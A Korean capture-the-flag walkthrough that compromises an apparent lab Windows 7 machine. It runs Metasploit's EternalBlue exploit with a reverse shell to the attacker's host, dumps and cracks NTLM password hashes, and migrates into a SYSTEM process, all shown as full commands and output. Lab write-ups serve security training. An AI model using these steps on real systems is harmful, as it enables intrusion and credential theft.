일반적인 구성 오류 문제를 활용하여 Windows 시스템을 배포하고 해킹하기
#
##### 1. 정찰
스캔
```
┌──(root💀kali)-[~]
└─# nmap -Pn 10.10.137.179
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-05 06:16 EST
Nmap scan report for 10.10.137.179
Host is up (0.30s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49160/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 19.49 seconds

```
취약점 스캔(--script=vuln)
```
┌──(root💀kali)-[~]
└─# nmap -Pn -p 135,139,445,3389,49152,49153,49154,49158,49160 10.10.137.179 --script=vuln                                                             130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-05 06:24 EST
Nmap scan report for 10.10.137.179
Host is up (0.32s latency).

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49160/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 83.86 seconds

```

##### 2. 액세스 권한 얻기
찾은 취약점(ms17-010)으로 metasploit
```
msf6 > db_nmap -sV 10.10.137.179
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-05 06:28 EST
[*] Nmap: Nmap scan report for 10.10.137.179
[*] Nmap: Host is up (0.34s latency).                                                                                                                        
[*] Nmap: Not shown: 991 closed ports                                                                                                                        
[*] Nmap: PORT      STATE SERVICE            VERSION                                                                                                         
[*] Nmap: 135/tcp   open  msrpc              Microsoft Windows RPC                                                                                           
[*] Nmap: 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp  open  ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49158/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49160/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 183.98 seconds

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                Required  Description
   ----         ---------------                                --------  -----------
   CHECK_ARCH   true                                           no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                           no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                          no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit/apps/pro/vendor/bundle/ruby/3  yes       List of named pipes to check
                .0.0/gems/metasploit-framework-6.1.20/data/wo
                rdlists/named_pipes.txt
   RHOSTS                                                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
                                                                         Metasploit
   RPORT        445                                            yes       The SMB service port (TCP)
   SMBDomain    .                                              no        The Windows domain to use for authentication
   SMBPass                                                     no        The password for the specified username
   SMBUser                                                     no        The username to authenticate as
   THREADS      1                                              yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.137.179
rhosts => 10.10.137.179
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.137.179:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.137.179:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```
취약점 리스트

![image](https://user-images.githubusercontent.com/61821641/148217290-ca996a6c-83d0-4f65-9cef-116d2c52f785.png)

use 0
```
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.254.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.137.179
rhosts => 10.10.137.179
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.9.1.147
lhost => 10.9.1.147
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.9.1.147:4444 
[*] 10.10.137.179:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.137.179:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.137.179:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.137.179:445 - The target is vulnerable.
[*] 10.10.137.179:445 - Connecting to target for exploitation.
[+] 10.10.137.179:445 - Connection established for exploitation.
[+] 10.10.137.179:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.137.179:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.137.179:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.137.179:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.137.179:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.137.179:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.137.179:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.137.179:445 - Sending all but last fragment of exploit packet
[*] 10.10.137.179:445 - Starting non-paged pool grooming
[+] 10.10.137.179:445 - Sending SMBv2 buffers
[+] 10.10.137.179:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.137.179:445 - Sending final SMBv2 buffers.
[*] 10.10.137.179:445 - Sending last fragment of exploit packet!
[*] 10.10.137.179:445 - Receiving response from exploit packet
[+] 10.10.137.179:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.137.179:445 - Sending egg to corrupted connection.
[*] 10.10.137.179:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.137.179
[*] Command shell session 1 opened (10.9.1.147:4444 -> 10.10.137.179:49249 ) at 2022-01-05 07:23:49 -0500
[+] 10.10.137.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.137.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.137.179:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
          

C:\Windows\system32>

```
flag1
```
C:\Windows\system32>cd c:\
cd c:\

c:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of c:\

03/17/2019  01:27 PM                24 flag1.txt
07/13/2009  09:20 PM    <DIR>          PerfLogs
04/12/2011  02:28 AM    <DIR>          Program Files
03/17/2019  04:28 PM    <DIR>          Program Files (x86)
12/12/2018  09:13 PM    <DIR>          Users
03/17/2019  04:36 PM    <DIR>          Windows
               1 File(s)             24 bytes
               5 Dir(s)  20,447,956,992 bytes free

c:\>type flag1.txt
type flag1.txt
flag{access_the_machine}

```
flag2
windows7 암호가 저장된 장소를 구글링해보면 ` C:\Windows\System32\config`가 나온다.
```
C:\Windows\System32\config>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Windows\System32\config

01/05/2022  05:18 AM    <DIR>          .
01/05/2022  05:18 AM    <DIR>          ..
12/12/2018  05:00 PM            28,672 BCD-Template
01/05/2022  05:29 AM        18,087,936 COMPONENTS
01/05/2022  05:57 AM           262,144 DEFAULT
03/17/2019  01:32 PM                34 flag2.txt
07/13/2009  08:34 PM    <DIR>          Journal
01/05/2022  05:47 AM    <DIR>          RegBack
03/17/2019  02:05 PM           262,144 SAM
01/05/2022  05:29 AM           262,144 SECURITY
01/05/2022  06:11 AM        40,632,320 SOFTWARE
01/05/2022  06:30 AM        12,582,912 SYSTEM
11/20/2010  08:41 PM    <DIR>          systemprofile
12/12/2018  05:03 PM    <DIR>          TxR
               8 File(s)     72,118,306 bytes
               6 Dir(s)  20,447,956,992 bytes free

C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{sam_database_elevated_access}

```
flag3
Desktop이나 Downloads 폴더에 유용한 정보가 있을 수 있다.
```
C:\Users\Jon>dir Documents
dir Documents
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon\Documents

12/12/2018  09:49 PM    <DIR>          .
12/12/2018  09:49 PM    <DIR>          ..
03/17/2019  01:26 PM                37 flag3.txt
               1 File(s)             37 bytes
               2 Dir(s)  20,447,956,992 bytes free

C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{admin_documents_can_be_valuable}

```
3. hashdump

eternalblue exploit을 payload 없이 실행하였다.
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.137.179    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windo
                                             ws Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows E
                                             mbedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded St
                                             andard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.9.1.147       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(windows/smb/ms17_010_eternalblue) > run
```
meterpreter셸로 변환되었다.

hashdump명령어로 얻은 hash data를 파일로 저장해두자.
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

```
johntheripper로 hash파일을 크랙
```
sudo john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
```
![image](https://user-images.githubusercontent.com/61821641/148221076-519514e9-ef6f-461d-9ad7-6839af83fc74.png)

4. 권한상승

이전에 얻은 쉘을 배경으로 한다.(ctrl+z)
```
C:\Users\Jon\Documents>^Z
Background session 2? [y/N]  y
```
metasploit에서 셸을 meterpreter 셸로 변환하는 방법을 포스트 모듈로 간단히 수행할 수 있다.
```
post/multi/manage/shell_to_meterpreter
```

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.1.147:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200262 bytes) to 10.10.137.179
[*] Meterpreter session 4 opened (10.9.1.147:4433 -> 10.10.137.179:49291 ) at 2022-01-05 08:00:59 -0500
[*] Stopping exploit/multi/handler

```
set session 이후 session에 접속한다. (여러번 시도해야할 수 있다.)
getuid를 해보면 가장 높은 권한인 NT AUTHORITY\SYSTEM 임을 알 수 있다
```
sessions -i NUM
```
```
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...


C:\Users\Jon\Documents>^Z
Background session 2? [y/N]  y
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```

```
ps
```
![image](https://user-images.githubusercontent.com/61821641/148222919-ec02c326-c658-4f6e-b026-610cd25d2403.png)

SYSTEM 으로 실행 중인 목록의 맨 아래 근처에서 프로세스를 찾으면 PID(가장 왼쪽 열)를 기록해 둘 수 있다. 이 번호가 있으면 보유한 PID로 마이그레이션 명령을 간단히 실행할 수 있다. 이 경우에는 출력에서 spoolsv.exe 서비스(PID 의 1308 )를 선택했다.
```
meterpreter > migrate 3020
[*] Migrating from 2420 to 3020...
[*] Migration completed successfully.
```

